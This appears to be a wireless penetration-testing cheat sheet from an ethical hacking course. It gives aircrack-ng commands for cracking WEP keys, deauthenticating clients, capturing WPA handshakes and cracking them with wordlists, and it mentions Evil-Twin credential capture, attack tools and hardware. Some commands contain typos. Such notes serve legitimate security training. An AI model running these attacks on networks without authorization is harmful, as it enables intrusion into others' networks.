Wireless pentest

Open network

• Usually for guest access and only for internet

• The guest can access it directly or they need to authenticate through a portal

WEP

• This protocol has been completely broken for many years and should not be used anymore.

• We can find the key very easily

# Capture around 30 000 IV (maybe more)
airodump-ng -c 11 --bssid 60:A4:4C:20:DF:60 -w [OUTPUTFILENAME] wlan0mon
# Generate ARP traffic
aireplay-ng -3 -b 00::09:58:6F:64:1E -h 44:60:57:c8:58:A0 wlan0mon
# Monitor the number of IV with
Aircrack out.cap
# Break the key
Aircrack out.cap

WPA

• 2 authentication modes :

  • Personal = WPA PSK (Pre-Shared Key) = authentification by a secret shared with everyone (like at home)

  • Enterprise = WPA MGT (Management) = EAP (Extensible Authentication Protocol). It is possible to use several different EAP methods (see the official list on the IANA website) but here are the most common versions:

    • PEAP : historically the only protocol supported by Windows, transmits the credentials of the AD via an MSCHAPv2, thus allowing to recover a NetNTLMv2 hash through the Evil-Twin attack.

    • EAP-TTLS : very similar, can authenticate via login/password which can be recovered via the Evil-Twin attack if the clients do not check the certifcat of the access point.

    • EAP-TLS : mutual authentication by certificate.

The Hacking process

image

Source: Practical Ethical Hacking - TCM Security

# check if the wireless card is detected
iwconfig
# shut card if necessary
ifconfig wlan0 down
# kill all interference
airmon-ng check kill
# put the card in monitor mode
iwconfig wlan0 mode monitor
# relaunch it
ifconfig wlan0 up

OR

# check if the wireless card is detected
iwconfig
# kill all interference
airmon-ng check kill
# put card in monitor mode
airmon-ng start wlan0
# check if it worked
iwconfig
# Find the ssid in our scope for the test
airodump-ng wlan0mon
# monitor our target for handshakes. For -c we need to specify the channel number found with the previous command and for the bssid option we need the mac address we also found with the previous command
airodump-ng -c <channel-number> --bbsid <MAC-ADDRESS> -w outfile 
# sending deauth
airplay-ng -0 1 -a <MAC-ADDRESS> -c <MAC-ADDRESS-STATION> wlanmon0
# check our capture .ap file to crack the handshake
ls capture*
# crack the handshake with a wordlist
aircrack-ng -w wordlist -b <MAC-ADDRESS> capture-NN.cap 

Tools

• Wifite

• Fluxion

• EAPHammer

Equipment

• The following are equipment that can be used for wifi pentest

  • Wireless card Alfa AWUD036NH

  • Alfa AWUS1900

  • Alfa AWUS036ACH

  • Alfa AWUS052NH

  • Alfa AWUS051NH

  • Alfa AWUS036NHR

  • TP-Link TL-WN722N

  • Hak5 Pineapple Nano Basic

  • Flipper Zero along with the wifi dev board

Resources

Wireless Penetration Testing Checklist - A Detailed Cheat SheetGBHackers On Security

Wireless pentest checklist

Pwning WPA/WPA2 Networks With Bettercap and the PMKID Client-Less Attackevilsocket

PWNING WPA/WPA2 NETWORKS WITH BETTERCAP AND THE PMKID CLIENT-LESS ATTACK - on evilsocket

cracking_wpa [Aircrack-ng]

How to Crack WPA/WPA2

WirelesSHack – Source of news for electronic projects including Linux, Wireless Security, KODI, SDR, Raspberry Pi, How-To- information, Reviews, Guides and Tutorials.

WirelesSHack

Practical Ethical Hacking - The Complete Course

Practical Ethical Hacking - TCM Security